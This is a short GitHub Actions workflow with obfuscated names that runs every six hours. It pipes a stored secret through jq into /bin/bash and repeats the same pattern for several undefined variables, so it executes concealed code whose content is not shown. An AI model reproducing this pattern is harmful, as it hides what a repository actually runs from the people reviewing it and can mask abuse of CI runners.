name: mnajx

on:
  workflow_dispatch:
  schedule:
    - cron: '10 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mnajx
        env:
          nfeut4334: ${{ secrets.nfeut4334 }}
        run: |
          echo $nfeut4334 | jq -r .e5331 | /bin/bash
          echo $pynsh3074 | jq -r .bo5229 | /bin/bash
          echo $rqylz8297 | jq -r .b47618 | /bin/bash
          echo $tjs0 | jq -r .ycsd157 | /bin/bash
          echo $nc0865 | jq -r .aucjd30 | /bin/bash
          echo $qdfh565 | jq -r .i9 | /bin/bash
          echo $rt6289 | jq -r .tzoqc07 | /bin/bash
          echo $ho248 | jq -r .kmw15 | /bin/bash
          echo $uxf09342 | jq -r .tk24413 | /bin/bash
          echo $qpu01112 | jq -r .jqvge9496 | /bin/bash
          echo $ym538 | jq -r .jbaub23 | /bin/bash

